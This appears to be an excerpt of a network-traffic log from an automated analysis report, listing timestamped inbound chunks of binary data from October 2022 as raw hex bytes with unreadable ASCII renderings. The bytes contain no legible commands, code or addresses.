                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC31672INData Raw: b1 e1 71 54 6b 32 f7 79 80 1c b6 28 46 b4 44 20 7b 14 00 4b 77 82 d9 a6 4b e3 7e 3d d8 4c 2b a6 4f e7 8e f8 5f d7 bd 4c 0a 22 31 12 41 ad 21 5e 5e 6f b2 3e 4a 50 10 57 e5 64 32 9f 0d a0 e1 03 87 9f 48 58 e1 90 dc a3 d4 93 90 e3 2d 80 8a 07 6b 98 88 ee dd fd 8d 00 8a 8e c4 da e1 3f 87 b3 3c 4a 68 21 99 8e e2 61 58 b7 1d aa f1 e0 b8 73 5a 09 55 83 77 11 ad 81 04 03 07 4e 0b 22 87 c2 8b 4c c7 09 5b 88 f2 58 42 5f c6 24 a2 c7 81 93 25 90 da 94 40 67 93 71 5b ba 50 bc be 8f a2 1d 2d 12 70 76 72 d4 b8 ff 55 a7 fe 7c 7b 7c 3c db 9d dc e8 5f 2e 18 d7 8d 6d 50 fb 58 30 9b 81 04 4c d8 f9 2f 29 99 b6 fe 5b dc 4a 24 29 2f be 31 e3 f0 15 ea 91 07 b9 5d 34 79 e2 76 01 6b 41 dd 62 ca d3 bd 89 e5 41 70 05 d7 e9 04 f1 b0 8d 0e f9 15 99 21 72 94 48 34 f7 a8 a7 c1 c0 fd 53
                                                                                                                                                                                                                                    Data Ascii: qTk2y(FD {KwK~=L+O_L"1A!^^o>JPWd2HX-k?<Jh!aXsZUwN"L[XB_$%@gq[P-pvrU|{|<_.mPX0L/)[J$)/1]4yvkAbAp!rH4S
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC31688INData Raw: d1 9d 04 70 5d 7c d4 bb 60 60 66 fd bc 05 2a 80 c6 69 bd df 46 b6 ab 70 0a f2 65 f4 25 27 dd 4f f8 19 17 4c 28 24 38 c2 b5 09 de 44 65 72 11 16 9f c5 8f 55 29 02 f6 2d 51 af eb 35 72 15 35 ff 46 90 02 9f 47 4b 0a 44 45 17 90 8f ea 0d a6 b5 b8 12 6c 1b 91 59 03 c8 07 02 a3 4d d5 b0 14 0d 60 12 f2 9b 4a 6b 15 03 5d 63 f6 e2 e4 37 51 3f 07 9f 8e bf fa f3 b7 32 73 91 5b dd 3b 54 ff ef c4 3e d7 09 a5 a5 d6 ee 81 d6 bd 91 b9 a9 a6 9a 4b 4d c1 09 3e 49 85 e8 70 b9 37 db 50 93 6c de 6d 85 30 c8 d4 e2 d7 4b ee f3 7b a9 b7 a1 22 2e be 37 66 88 81 dc 02 25 cf 8d 8f ef e7 f6 f9 30 85 32 be 79 90 99 57 5b 50 9f 90 41 dc d3 a0 85 96 47 d0 07 bd 0c b0 d2 cd 66 13 5d 69 3a 01 79 80 14 f3 2c 77 e6 dc 1c 5c 87 27 10 3d d4 9d 31 60 37 fb 3f 09 ac 5e 99 d5 47 80 d6 ea b6 7d
                                                                                                                                                                                                                                    Data Ascii: p]|``f*iFpe%'OL($8DerU)-Q5r5FGKDElYM`Jk]c7Q?2s[;T>KM>Ip7Plm0K{".7f%02yW[PAGf]i:y,w\'=1`7?^G}
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC31704INData Raw: ef 8e ce 8c 30 30 96 16 7c 50 77 0f cb f3 f0 ce 17 0f 4c d1 a0 11 2b 05 5b 26 54 0a 85 e0 f2 22 8a c0 e7 25 38 3b 88 64 b4 4c 10 b1 27 87 e4 32 61 6e d0 12 72 df af a9 f5 c6 df b7 56 c1 98 3e ed 96 30 47 dc fe f0 47 12 95 e3 46 b0 82 b1 b1 69 0d 7e 00 64 0d 9a f0 37 ef f6 bf b1 37 5a 32 c3 1d 0e 4c 69 9d 65 18 63 e4 f8 d6 f4 b8 3b d5 f4 45 fb 49 9a 4a ef 0b 33 a6 95 bd 2d 23 50 ec 38 1b a8 c2 a2 2b f6 1d 21 7e d9 4b d2 45 1a fc 81 a6 52 2f c6 05 65 8a 6f 0a 8a fb 1c 9d 61 24 44 fe f3 69 48 4c bc f3 c5 2b ea c7 ae f0 d7 ee 07 df dd 91 00 27 e5 d1 b3 94 84 54 ec e8 52 c2 e9 c3 01 00 9e 2a d2 b5 c1 bf de ca f8 06 2a 47 ca 1b 54 35 3c 21 3c 2e 27 e1 8f 0b 0d 1f 75 7c 9b af b4 53 03 11 46 41 b2 16 db c7 e3 a8 51 75 d2 02 55 be dd fd 11 b6 bf fd ed 01 6a a4 03
                                                                                                                                                                                                                                    Data Ascii: 00|PwL+[&T"%8;dL'2anrV>0GGFi~d77Z2Liec;EIJ3-#P8+!~KER/eoa$DiHL+'TR**GT5<!<.'u|SFAQuUj
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC31720INData Raw: 59 56 f7 4a 1f 4e a3 1f 10 1d 78 0c d3 c8 70 33 87 2e 37 f7 b4 cb 42 83 19 05 18 b2 c2 7c bd af 25 39 33 7d 78 9a a6 ac c4 6c 8c 2e a9 f3 e3 4b ac f7 c5 52 48 1e f0 6d 8f 06 5c 76 f3 51 1f c4 cc ff 68 85 4d d5 65 66 81 3a a0 d0 e0 02 62 a2 e0 77 25 0f 73 9e 5c cb ed 3e 02 b5 eb e2 22 de f8 7e 24 df 34 89 f3 08 5c fa 07 7e 5f c5 6b 3b ab 93 74 98 e3 f6 3c cc bb 17 c8 85 14 71 ae df e0 d5 e8 4c 88 31 a3 ca 7a d0 bc 74 2f ec 22 5e 97 25 e7 ab ec a9 48 58 83 c7 e2 e5 11 88 8f 40 d9 d9 c2 81 8c b5 34 84 91 a2 1e 87 a1 f7 bc 10 bf 8d 56 9c 31 03 5b d5 bb f6 6a fb b1 24 19 91 e9 d2 ab 48 dd 81 e1 9e 52 c3 de 35 0c e3 e8 4c 80 99 a5 a2 4e 29 e7 d0 06 ba 5e da 7b 17 0e 71 d0 d1 a3 82 34 ff 69 db 6c 15 8f 9f d8 bf 20 a7 8c 88 36 a8 14 a7 e3 4c 6e 3c 4b 0d 3c b6 9d
                                                                                                                                                                                                                                    Data Ascii: YVJNxp3.7B|%93}xl.KRHm\vQhMef:bw%s\>"~$4\~_k;t<qL1zt/"^%HX@4V1[j$HR5LN)^{q4il 6Ln<K<
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC31736INData Raw: f9 1f eb eb 72 da ba b6 22 93 1c 21 30 ea 8d 1f ee e9 dd 51 02 2a 5e c2 ad 82 70 ea e3 43 66 9e e2 34 30 58 01 c5 6e 61 1b e8 87 a7 73 40 de eb 7d 4b 60 d0 7b d4 41 87 f7 f2 7b 77 9f 10 3d 79 a4 5a 30 aa 45 7c 33 69 a5 6e 89 64 29 f3 d4 8f 29 83 76 28 bf c7 dd 71 8d 4e 53 cc df a2 b1 6b e7 bf 98 a0 d7 f1 85 06 85 02 8b b2 88 7b 7e 99 d1 94 a4 88 80 1c 1a 0c 11 dd ed 29 d2 26 88 cb 1c 32 e1 9f f4 f0 3b 0d 5f 10 f9 23 6b bc 18 ef c6 d7 f6 10 1e 93 50 0a c4 d6 70 f3 a0 0a 98 b4 b1 66 be 6f 0e 9f 60 c4 80 ed 9f 81 8b c4 e8 1a 24 f8 59 14 75 e5 2a 89 54 03 b3 e9 09 ab a1 53 3a 6f 81 17 ca b6 ef ec be 48 d7 1a 1a 4c 9d 91 0f 77 10 44 52 85 ae a9 f1 ba 06 d3 0a 9f 04 c9 81 60 c8 29 fe 1d 57 88 de 8e c5 c2 70 28 e9 16 ee 19 d1 69 de 38 d0 15 eb b5 9f f6 7d 88 35
                                                                                                                                                                                                                                    Data Ascii: r"!0Q*^pCf40Xnas@}K`{A{w=yZ0E|3ind))v(qNSk{~)&2;_#kPpfo`$Yu*TS:oHLwDR`)Wp(i8}5
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC31752INData Raw: e3 3e 1e ae 48 37 46 6d 0e 8e b1 0c 65 06 d5 b9 76 34 b9 3e a3 96 06 63 e8 93 82 de df 4f 9d 0a 36 17 50 69 0e 8e aa 0c d6 be 2c 2f 09 45 dc cb 76 70 fb 53 11 f8 7d 5f f2 3b 71 42 86 8e 57 7a 3d 7c 0e 03 17 34 ce 16 68 fa 48 b1 85 7b 06 90 a3 ac 4e 33 ec 2b 03 84 30 7b bc b4 25 b7 38 d9 c3 b5 b9 cc 2b 81 01 f9 f8 17 16 b7 42 71 20 bd 65 a6 42 c0 75 6b 18 0d 89 f6 34 37 3a 97 23 39 43 01 cf 44 ab 30 96 f4 63 6d bf 4f 89 67 2b 1e c6 22 27 44 22 89 49 1c c0 0f f3 d1 06 42 8a 85 46 4e ad 6c 58 a9 3a f4 08 08 ea 70 2d 27 71 a2 03 4b f5 1c a7 40 74 32 e7 82 d5 f7 3e 1c e8 11 f9 69 77 03 89 09 8a ee 5f 68 a1 b5 18 ef a0 bd b9 96 ec 93 a8 ee b9 b6 0e 02 ac 50 6a 38 77 1b 85 fd f7 54 fb 00 1b e6 ad 95 97 e1 80 dc 94 b8 61 0e c0 41 a9 4b 60 c7 e1 dc 23 77 4c 78 4e
                                                                                                                                                                                                                                    Data Ascii: >H7Fmev4>cO6Pi,/EvpS}_;qBWz=|4hH{N3+0{%8+Bq eBuk47:#9CD0cmOg+"'D"IBFNlX:p-'qK@t2>iw_hPj8wTaAK`#wLxN
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC31768INData Raw: cf 90 bd 95 6d 12 a3 d7 28 6d 16 b4 81 c0 84 b8 cd 12 61 82 8c 72 64 1b d3 78 dc bb d8 ec 77 14 d9 55 b4 95 d0 08 48 b8 38 e8 2a bc 68 b7 c2 8d 8a 93 98 f0 f8 1e 06 bb 25 ee 69 44 c8 4b 5b 4b 0c 64 73 04 02 b8 c7 ea 0e 0b 79 c8 3b 64 2a 5f cf 5a 65 5d 96 c3 4b 00 57 e8 f8 89 63 21 f2 a7 c1 fe a5 50 cd b3 9b 71 e4 4a 47 6e 75 bb af 2f 81 7c d1 c9 2a 03 c3 72 5a 9d 98 0f 1b 12 d4 74 49 f4 f0 12 ba ad 09 4c e3 dc 9d 84 3b 31 01 09 18 8e f0 c2 be a7 a9 89 a1 28 70 cf ce 7c c5 c3 02 cc e0 47 55 ec e8 a1 e1 c6 11 2d 7b cb 49 60 c0 4a d4 b4 ce 3e 54 c7 19 a3 2c 9b aa c7 71 e9 94 d2 13 df 60 23 66 55 5e 23 3e 5e bf d8 6b 61 f7 d2 d0 2a 45 7c ba 30 d8 09 d9 8a 18 6d d6 0a aa e5 02 85 68 e1 29 9a 54 de 55 38 c0 20 5d dc 3c c7 54 3b 86 72 18 08 5b 5b bc 6a 28 20 0d
                                                                                                                                                                                                                                    Data Ascii: m(mardxwUH8*h%iDK[Kdsy;d*_Ze]KWc!PqJGnu/|*rZtIL;1(p|GU-{I`J>T,q`#fU^#>^ka*E|0mh)TU8 ]<T;r[[j(
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC31784INData Raw: 20 84 ff af c4 da bc 28 aa fd 92 34 a1 4a da 2b b6 43 96 85 74 2e 64 7d 63 ec 61 5a ba a4 29 e5 56 ff bd 4b cd 57 f3 f4 0f b7 4e 1e 25 7a 04 d6 76 1e 84 cc ad da cc 66 cb e6 f0 18 5c 2e 46 b1 97 b2 dc b0 ce 2d 38 ea 0d f1 16 0a 38 c3 fd ae cf e9 ed 36 52 46 fd 75 45 f3 03 98 65 38 ed bb 32 ad ad 50 7d dc 26 34 6f 3f 5f 35 31 db 60 33 da 32 cd 92 dc 1c b9 be 48 eb c5 b9 e1 59 60 66 42 af f0 66 a1 09 7b 0d 62 86 f6 4a df 29 aa 8a 7e e8 2b 03 25 a8 a3 ce 3f f9 04 6c f2 bf c6 2c c0 b9 00 00 9c df 2f a3 42 55 0e a2 45 70 58 c7 6c 7b 40 14 c5 39 ae 10 88 16 68 f2 b8 d6 da a9 9e 0c 2b 1c 1c 03 d4 1e 40 11 5b 98 7a 8a 8a ba 84 8b 70 bd e6 23 03 fc fc 26 49 0a f8 64 6c 00 17 16 21 1d da 80 f5 8d 2b da b9 cb 8a af dc b6 8e f6 99 00 de ad b2 dc d2 5d 27 7a 72 04 58
                                                                                                                                                                                                                                    Data Ascii: (4J+Ct.d}caZ)VKWN%zvf\.F-886RFuEe82P}&4o?_51`32HY`fBf{bJ)~+%?l,/BUEpXl{@9h+@[zp#&Idl!+]'zrX
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC31800INData Raw: f0 bf 38 ae 55 b7 10 d7 87 cf 45 9e 78 ba 94 a7 25 89 9b 2d 6b 65 6d 49 23 8a f6 2d 7a 51 ff 51 e0 3c eb 2b ff 77 5b 7a d0 a1 98 c1 72 2c 78 a5 a7 5c 24 03 ce 34 43 4d 9b dc b2 14 ba 03 b1 5a 5c 48 9b 1e fd ce ee 92 0e e2 7f 99 c8 ce 78 ff bc 04 08 d3 ad 09 b2 a2 30 d3 5e 1a e6 ee 4f a2 66 62 14 91 88 bf af 2b c2 fb ca cd 0b 9c ba 3d 6f f4 01 0e 3f a1 f7 ec de cd 71 66 4b 02 6c 35 42 86 c9 60 2a 33 42 36 ec fc 97 dc 9b 1a 55 68 63 81 a9 63 12 bc ff cd 09 c0 a9 cf 1a d2 26 d6 85 ea 55 c1 d0 91 17 c1 e7 1d 4b 45 b9 86 07 ab 2c 3d 74 ed 02 a1 0e b7 d8 d0 ab c3 79 88 68 f9 7f 8f ac 4b 2a 8b c6 10 82 ec dd 2f 6c 4c 5b f9 da 60 96 5e 0b ff 27 d9 82 92 c3 8a 17 e0 4c 46 74 8b b3 88 9d c4 67 f7 5d 63 c0 68 4a 5a 9b cc 6f a2 36 16 de 6b e8 90 78 bb 3f 33 a4 e3 8d
                                                                                                                                                                                                                                    Data Ascii: 8UEx%-kemI#-zQQ<+w[zr,x\$4CMZ\Hx0^Ofb+=o?qfKl5B`*3B6Uhcc&UKE,=tyhK*/lL[`^'LFtg]chJZo6kx?3
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC31816INData Raw: 0d 0c 06 a3 d7 b3 1e 18 6b b3 f2 09 13 34 e1 f8 93 98 31 aa b2 b3 02 37 b9 d0 71 19 d3 31 38 9a 8b b7 b4 94 db 3a be c1 e8 ca f9 fe 98 81 9c 92 a6 f0 17 d1 b1 db e9 a6 60 9b 43 5f 7d 3d 97 c4 08 05 c1 12 b8 55 4e 17 70 14 7a 3a 5a 0c 9b 18 91 46 a0 40 6a c7 76 34 da e8 39 40 00 9a 3f 2f 8f 74 b7 ff 90 f6 ee 92 a0 ec ca 1d 76 11 7d 21 18 4b 94 cb 72 8d d1 f9 c0 92 7e e8 e4 e5 58 74 87 0c c4 11 30 30 13 ae 10 bc 74 9e f7 07 52 0a 22 a4 c6 8b d7 e9 97 d2 e6 1a 9a c8 9d 0f 50 00 e5 79 6e 5d cc 1c 04 de fd 0d 09 26 14 63 46 b7 e0 af 17 4f 90 bc a4 11 b5 4b e8 6c b1 25 19 45 1d 2a 57 87 a1 0f 70 b3 a4 11 aa 50 2a a4 37 85 bd 25 18 c1 da de 4d 3f 00 b7 29 4f 27 42 9d 4b cd 0f 51 53 75 04 6f 4d b0 86 ff 5d 3f 8f 57 fe bd a9 9e 3e 37 d3 8e 5c 77 e5 79 a6 ee 1c 88
                                                                                                                                                                                                                                    Data Ascii: k417q18:`C_}=UNpz:ZF@jv49@?/tv}!Kr~Xt00tR"Pyn]&cFOKl%E*WpP*7%M?)O'BKQSuoM]?W>7\wy
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC31832INData Raw: bd 83 eb b4 a3 16 3e fa 71 7e 2c 2a 4d d4 88 76 bf 24 a9 0c 2e 9c bc 53 96 1a d0 21 88 93 af 2b 9e 57 d2 14 d5 c8 b7 66 cf 26 6b 33 93 b3 5a 46 02 43 d1 39 df 10 14 be 44 18 5a d3 e6 e7 e1 a6 db a6 8b 96 cc 64 ee 1b 47 b2 dd 02 a4 12 92 d0 d0 be 0a 03 ab 1f 0e 7a fe 7c a4 f0 60 db ca 0b 07 08 25 5b c3 65 20 4c 6b 70 2c de 36 4e 26 09 87 17 48 8c 3b 92 43 e7 a3 eb a5 75 27 09 1e 06 5a e0 30 87 dc ea e8 31 c9 e9 c3 7f 8a c2 6f a1 69 82 35 ee 1b cf ed 27 ac 21 d1 cc 24 bd e4 00 98 86 72 f4 66 57 84 87 6a a8 f5 dc b7 14 20 4b 9c 27 da 59 f3 6b 59 09 7d 57 9f 46 1b 8c db b5 26 f1 a1 f8 6e 22 97 86 47 9b ae f9 85 c3 79 ea d9 d6 a4 37 07 ff 27 94 5d ba fa d1 0f ca 27 b5 d9 68 d4 df b4 03 b0 73 be 69 da b4 b3 77 55 f6 f5 d0 df 8c 1b ad 3b 6e 50 f3 3e 4f 3b 75 1f
                                                                                                                                                                                                                                    Data Ascii: >q~,*Mv$.S!+Wf&k3ZFC9DZdGz|`%[e Lkp,6N&H;Cu'Z01oi5'!$rfWj K'YkY}WF&n"Gy7']'hsiwU;nP>O;u
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC31848INData Raw: fa 82 15 7a cf 9c 42 82 22 32 dd be b8 5f de ff e3 8d 8f cf c9 dc e6 38 4f de 66 10 ec ae 59 5d 9a a5 d2 67 02 d8 ca 5c 54 d0 b3 f0 4d a1 fc 50 7e 43 02 86 df ee 99 e8 fb 9b 46 06 85 ba 1c 98 c9 49 0c 59 d9 a0 4f 7b 0e b7 7b 37 87 e1 79 f2 40 4e 2e b1 c5 8b 66 d2 e9 87 d8 72 04 1b a7 3e e4 0e 48 6f 08 30 c0 dc 83 cc 72 57 99 53 72 3a 2c b6 bd 29 64 5b 9a 26 96 a6 85 75 4f 2c 6f 44 62 ec d6 17 a7 34 27 ee df ed 0a c1 4d a6 c5 b8 c3 46 42 5e 14 de 60 06 0d 17 11 20 90 c9 59 80 98 2b 4f e0 c9 dc 5f d3 42 8e ad 58 22 69 21 a9 8e 20 ff 48 c2 f7 ea 24 b7 47 f7 9f 10 cf 44 e5 70 46 6a 7c ef 73 7e 65 95 21 2d f6 c1 3a cb 4e 03 ce 55 9b dd d2 7b cd 08 81 4a 79 52 7a 3e fc 09 2d 0f 63 31 a9 3b 43 14 84 61 29 be b7 35 a2 97 b6 50 ee 48 ae 9f 69 d4 dc b9 26 cf e2 70
                                                                                                                                                                                                                                    Data Ascii: zB"2_8OfY]g\TMP~CFIYO{{7y@N.fr>Ho0rWSr:,)d[&uO,oDb4'MFB^` Y+O_BX"i! H$GDpFj|s~e!-:NU{JyRz>-c1;Ca)5PHi&p
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC31864INData Raw: 7b 8a 9a 38 b8 b5 77 85 fa 04 12 a9 5b c5 11 03 96 24 72 72 99 7a e4 b4 d5 6b 9b 6e f7 11 25 ce b0 f1 98 29 b6 f7 69 9b 1f 51 35 06 0e 19 40 13 db b8 0b 6d cf 13 50 3b 52 c1 3b 44 b8 68 a9 48 c1 6e 17 85 29 4e ac 6b ef a5 8d 59 98 c0 ef 2f f0 99 21 19 e0 88 e5 86 49 64 c2 94 b4 c6 5a 3a 0f b1 2a 68 bd 82 93 e9 68 b2 cd 51 b5 21 59 82 4b 46 d2 a1 e5 50 6c 76 0a 18 35 28 f8 f8 7c 8a 07 0b f8 6e f6 87 96 d6 6e 7a cc 8c d4 14 95 cc b6 4f 16 4e 36 bc 38 f5 02 46 59 fe 4d 86 24 57 a6 d1 6d c5 e8 de e4 5f 93 45 9f 62 c6 44 54 cc ee 6b 10 68 8f ee ce 17 a5 bd c5 d4 ba 88 46 37 68 a3 43 fc 74 6a 85 f1 8d 1b 18 93 7b f1 3d ba f3 f4 07 9d cf 21 19 10 25 51 52 a4 a3 8b 65 1c 59 36 77 93 cc eb e6 c8 26 22 a8 df dc b1 68 35 95 26 9d 7c ef f6 10 80 15 fb c4 c0 2b 25 b5
                                                                                                                                                                                                                                    Data Ascii: {8w[$rrzkn%)iQ5@mP;R;DhHn)NkY/!IdZ:*hhQ!YKFPlv5(|nnzON68FYM$Wm_EbDTkhF7hCtj{=!%QReY6w&"h5&|+%
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC31880INData Raw: f9 f9 a2 31 2a 78 46 8a 6f a8 51 54 0f 62 58 a6 9e bd 44 54 f3 fd 16 18 88 1d 39 b7 f8 6e 1e d8 68 bc 6b fb db e3 9a 08 d0 2b 0a 6f f8 e4 69 45 33 98 1e d6 2b 32 3b 14 19 22 3a f1 da 8c 01 40 16 53 89 3a 85 81 11 9e 8f 8a fa 06 0d 6d 69 ef 25 4c 03 b7 c2 28 8b d0 45 8e 85 12 40 3d c2 0d 58 19 d3 b8 84 69 a8 7f c6 7d 52 63 5e 49 ec 21 6a 80 e5 34 4b 76 51 f4 a1 d5 0e de e4 81 1e b4 f6 c9 c7 58 1b 48 e1 40 a4 20 bf 83 7a 31 c9 5b 2b ee b7 60 aa b7 68 0b 38 49 30 72 c4 09 21 bd ff 38 d4 45 6e 55 06 37 5d c2 18 ad 2f c0 df 2d 78 75 1e e1 9f e1 80 eb ef 95 a9 7c 60 52 2a 8f 87 cb e6 48 7f 14 0a 34 59 3a 06 d5 64 47 9f 4a d8 ec cf d3 47 8a 06 16 bd b9 9b 05 ab 0a 48 37 15 db a5 0d 12 51 a7 57 34 2a 27 a9 93 45 61 3e 22 bd 7c 2d 01 45 56 ab bf e9 39 93 aa bd e6
                                                                                                                                                                                                                                    Data Ascii: 1*xFoQTbXDT9nhk+oiE3+2;":@S:mi%L(E@=Xi}Rc^I!j4KvQXH@ z1[+`h8I0r!8EnU7]/-xu|`R*H4Y:dGJGH7QW4*'Ea>"|-EV9
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC31896INData Raw: 05 9c a4 c5 c8 21 ed 17 9f 2b 45 e3 9a fb 92 b4 00 c7 77 cc 0e db ea 86 c5 db 53 46 1b 62 2d 89 97 de 7d ac cf 15 a8 61 d9 12 fd 6f b0 85 56 c1 1e 21 da 23 de 6d 60 14 8b 66 08 16 01 68 dd ee 24 04 c3 17 65 1d fd 06 73 24 1b bf a2 55 e5 6d 7e b7 41 8d 34 d2 f2 34 20 58 1f 79 50 c0 6e 9d e3 bd bb 70 7a 00 e3 1b d6 75 ca b7 a1 4e 69 9b c5 2f 46 54 e1 87 f8 4a 07 41 ba 9a 85 d5 10 4f 57 e0 b3 5f 41 a2 0f 5a 4e fa 14 fc ca a6 0f 08 56 43 f2 b0 e4 3e 49 e9 2b 45 47 59 c2 6b 6f b4 9f 1f 56 ac 91 e0 ea 29 db 18 86 8a 49 f6 c7 99 c8 f3 5a 01 af 2b 79 cc ae 10 79 9d 45 48 ec 7e 26 b5 99 27 1a d8 cd 31 df 92 92 0a 12 c3 ca 7a 7d ec 86 b2 aa 90 41 7a d1 43 83 d0 79 85 eb a7 9f 43 7d ed a4 e0 47 15 0e 70 34 18 55 05 c8 39 26 89 bc 2f b6 09 c6 10 3a 29 79 4c 08 16 9c
                                                                                                                                                                                                                                    Data Ascii: !+EwSFb-}aoV!#m`fh$es$Um~A44 XyPnpzuNi/FTJAOW_AZNVC>I+EGYkoV)IZ+yyEH~&'1z}AzCyC}Gp4U9&/:)yL
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC31912INData Raw: 17 f6 d3 e4 f0 4d 45 da f5 33 85 39 cb b3 c1 47 9b a8 04 16 ba 95 c5 7b 38 43 af e6 76 db 37 bd 6c 51 bf ba eb 3a a9 e2 f3 ed 5b f4 d0 97 d1 15 93 8a 94 b4 f5 89 5c 38 9c 82 ea 6e 41 46 90 4f 27 90 b2 f1 d6 88 f7 2a fe 9f 26 09 16 b9 4e 0e 70 48 e8 ef 43 2a 5f 15 3b f9 98 ef b5 64 2d c2 30 f8 fd 31 09 1c 8c e3 77 91 3a 43 c8 e5 26 6f 63 de 03 ed dd 4b 28 ad 6d fb 1d db 7e f5 dc 8b 88 11 11 0b fc cc de 2a 9e d5 71 ee b9 ed 5d f6 66 9d ca 57 d8 e8 68 e8 6c a7 c8 fb fe 7f cf 94 ac 93 3e 7a 00 38 eb c9 f5 9c 71 a4 20 fa 9b 0c 54 3d 6e 14 c3 73 b4 8c 71 5d 1e fa 5d 74 c9 e6 35 b8 74 7b 3f 25 16 31 78 55 41 32 0c 8c 44 b5 f2 22 db bf c0 2a fb 91 5a 40 64 47 c6 7a 8e 72 28 04 7a d5 4b 82 fe 13 7e 0f 66 6b c5 fb 64 37 74 49 86 e2 af c7 02 cc 64 41 15 ae dc ca a9
                                                                                                                                                                                                                                    Data Ascii: ME39G{8Cv7lQ:[\8nAFO'*&NpHC*_;d-01w:C&ocK(m~*q]fWhl>z8q T=nsq]]t5t{?%1xUA2D"*Z@dGzr(zK~fkd7tIdA
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC31928INData Raw: 3c 7b 8e f2 c7 96 0f 68 40 48 aa af c5 0e 8a d0 e6 9d 7c e5 c1 cc b0 b4 9a 8d 80 39 01 53 16 e9 23 ea dd 49 70 9c 05 5d 91 83 71 e6 5c c3 1f 35 a0 86 6b 96 80 52 8d eb 9a bb 6a 93 59 83 06 63 bd 68 f4 76 28 64 e1 9b 21 94 cf d1 f8 c8 33 98 bc 4c 3d e4 87 b7 e1 1b 3e 03 92 b6 85 8e 5c f4 47 da e8 e6 de e9 01 9a c0 91 9f 58 68 8e 62 cd 65 86 4b 16 3c f8 6e 88 4f 19 d9 55 68 64 48 96 1e e7 59 fc eb a5 c3 f9 d3 05 cf 5c 27 e7 0d fe 57 62 4f 2e e5 e8 03 08 0b aa 45 65 a0 c9 28 2c 45 19 8c 6b dc 63 dc 7d a2 8f d7 e2 52 65 27 94 55 42 53 b4 c8 54 81 c4 9e 60 73 ee a5 85 54 bd ea a2 11 76 10 19 53 1c 2b 78 11 81 07 fd b3 09 2c ca 0c a0 65 c7 30 ab 96 ae bf 10 39 6b 43 c0 06 a8 81 c1 c8 64 c9 0a 5d 0a 3c 52 76 99 b0 0b 6d f5 76 77 fb 74 60 19 0d a5 9e 31 a4 3c 04
                                                                                                                                                                                                                                    Data Ascii: <{h@H|9S#Ip]q\5kRjYchv(d!3L=>\GXhbeK<nOUhdHY\'WbO.Ee(,Ekc}Re'UBST`sTvS+x,e09kCd]<Rvmvwt`1<
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC31944INData Raw: 17 c4 e8 9a f5 9b e6 b3 52 90 e0 96 c3 dd 6f 42 22 37 fe 5d 62 86 dd 3b e8 e3 30 30 c5 e9 e6 aa 01 66 66 e0 e9 0e c4 d2 c7 7f da aa 20 91 5c 36 cb 63 a5 32 d4 7c 74 82 39 a7 3d 21 2a 6e ec fd 73 3d 82 05 d6 b5 d8 51 ee 74 50 ac 7e 16 26 85 04 3d 68 eb b4 02 1f eb 4a 35 e7 f7 a0 2a 61 4c b0 1a 3a 50 fd b6 05 f4 7a 47 47 c1 17 00 c6 30 f8 26 62 6f c5 4c be fd 9d 06 a8 2f e0 d0 6f b7 47 3e f2 cb 1c df 27 a1 20 a9 3c b9 a9 a1 16 d4 b9 d6 a5 74 92 31 cf 95 b5 2b e1 8a 16 42 2a 08 98 ab 32 97 b8 d2 ee a5 9f 44 cc d0 bd 00 76 84 64 95 58 30 9d a4 d0 7a 1e c6 be 39 a3 32 1a 67 26 96 ba 8f 00 9d 1e e5 1c 45 77 24 92 a6 60 d5 18 44 92 4b e9 0c f4 13 41 8d d4 c0 5e 99 3e 8c 38 11 3a 76 ce 53 0c e1 f0 ca 52 bc 25 ff b8 c6 81 7a bb f7 e5 8c b1 75 b0 35 cd 57 40 89 b6
                                                                                                                                                                                                                                    Data Ascii: RoB"7]b;00ff \6c2|t9=!*ns=QtP~&=hJ5*aL:PzGG0&boL/oG>' <t1+B*2DvdX0z92g&Ew$`DKA^>8:vSR%zu5W@
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC31960INData Raw: 04 c1 0e 6c bd 93 e9 1e 1a 34 47 4b ec 70 75 1c eb 08 12 6f 59 9b a7 62 cc e1 a3 d7 a6 23 87 88 20 77 f7 90 47 e8 66 60 da cf 69 42 96 66 eb 3a 4a fa ce c8 a9 c6 75 41 9a 42 73 a4 b0 bd f7 27 9a ac 8d fe 5c 6a 15 84 85 26 85 ae fc 18 18 63 fb 24 98 94 6c 60 a9 73 93 6b 3f 22 03 33 68 70 76 df 78 07 4d 72 9e 00 b1 e1 92 e0 ad dd 0a f7 e0 e4 c1 ef 87 07 83 4e f8 b3 9c 8c 90 06 99 32 73 02 84 fc 55 d0 d6 c3 53 1c ef a6 9a 1a fc b8 86 ad a8 b5 56 9a 95 88 0e ca bf 97 58 f4 66 8a 02 66 f1 09 c0 04 ec 01 10 35 ab 5d d4 83 65 91 de 3d 84 9e 14 c5 45 0c 07 d8 6c 02 76 ca 80 f1 3e b9 60 fc e5 f6 c8 5c 17 cb 90 99 eb 51 a3 af d4 13 64 52 f9 0a 6a 1b f9 a3 52 71 b5 39 08 2a a0 65 e4 1c 71 70 54 ee fe 04 50 50 64 f4 ae 78 11 e8 f7 7e 0b ea fc 25 da b3 95 92 f8 eb 12
                                                                                                                                                                                                                                    Data Ascii: l4GKpuoYb# wGf`iBf:JuABs'\j&c$l`sk?"3hpvxMrN2sUSVXff5]e=Elv>`\QdRjRq9*eqpTPPdx~%
